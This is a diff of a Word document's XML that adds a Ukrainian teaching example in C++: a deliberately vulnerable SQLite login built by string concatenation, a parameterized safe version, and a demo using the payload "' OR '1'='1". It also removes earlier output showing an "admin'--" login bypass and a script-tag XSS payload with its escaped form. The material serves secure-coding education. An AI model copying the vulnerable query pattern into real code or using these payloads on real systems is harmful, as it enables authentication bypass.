+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return db;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// ВРАЗЛИВИЙ варіант: запит склеюється з рядків, дані користувача</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// потрапляють у текст запиту й змінюють його структуру</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">bool vulnerableLogin(sqlite3* db, const std::string&amp; login,</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                     const std::string&amp; password) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::string query = "SELECT login, role FROM users WHERE login='" + login +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                        "' AND password='" + password + "'";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (sqlite3_prepare_v2(db, query.c_str(), -1, &amp;stmt, nullptr) != SQLITE_OK) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Помилка SQL: " &lt;&lt; sqlite3_errmsg(db) &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        return false;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (found) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "[ВРАЗЛИВИЙ] Вхід виконано як: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; " (роль "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 1) &lt;&lt; ")\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return found;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// БЕЗПЕЧНИЙ варіант: структура запиту фіксована, дані передаються</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">// окремо через параметри й ніколи не тлумачаться як код SQL</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">bool safeLogin(sqlite3* db, const std::string&amp; login, const std::string&amp; password) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const char* query = "SELECT login, role FROM users WHERE login=? AND password=?";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Запит: " &lt;&lt; query &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Параметри: ('" &lt;&lt; login &lt;&lt; "', '" &lt;&lt; password &lt;&lt; "')\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_stmt* stmt = nullptr;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_prepare_v2(db, query, -1, &amp;stmt, nullptr);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 1, login.c_str(), -1, SQLITE_TRANSIENT);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_bind_text(stmt, 2, password.c_str(), -1, SQLITE_TRANSIENT);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool found = (sqlite3_step(stmt) == SQLITE_ROW);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    if (found) {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">        std::cout &lt;&lt; "[БЕЗПЕЧНИЙ] Вхід виконано як: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">                  &lt;&lt; sqlite3_column_text(stmt, 0) &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_finalize(stmt);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return found;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">int main() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3* db = setupDatabase();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "=== Коректний вхід ===\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    vulnerableLogin(db, "admin", "secret123");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Атака SQL-ін'єкцією ===\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    // Введене значення закриває лапку й додає умову, істинну завжди</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::string injection = "' OR '1'='1";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool bypassed = vulnerableLogin(db, "admin", injection);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">              &lt;&lt; (bypassed ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "\n=== Та сама атака на параметризованому запиті ===\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    bool blocked = safeLogin(db, "admin", injection);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Результат: "</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">              &lt;&lt; (blocked ? "ЗАХИСТ ОБІЙДЕНО" : "доступ відхилено") &lt;&lt; "\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    sqlite3_close(db);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4264,252 +4812,301 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="120" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">============================================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ SQL-ІН'ЄКЦІЇ</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">============================================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">--- Звичайний вхід ---</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin' AND password='secret123'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">--- SQL-ін'єкція: admin'-- ---</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin'--' AND password='anything'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">АТАКА УСПІШНА! Увійшли без пароля.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">--- Той самий ввід через безпечний метод ---</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Запит: SELECT * FROM users WHERE login=? AND password=?</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Параметри: ('admin'--', 'anything')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Результат: None</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Ін'єкція заблокована!</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">============================================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ XSS ТА ЗАХИСТУ</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">============================================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Зловмисний ввід: &lt;script&gt;alert("XSS")&lt;/script&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Без захисту (HTML): &lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">НЕБЕЗПЕЧНО! Скрипт буде виконано в браузері.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">З екрануванням: &lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-        <w:spacing w:before="0" w:after="120" w:line="200" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Безпечно! Скрипт відображається як текст.</w:t>
-      </w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
+        <w:rPr>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
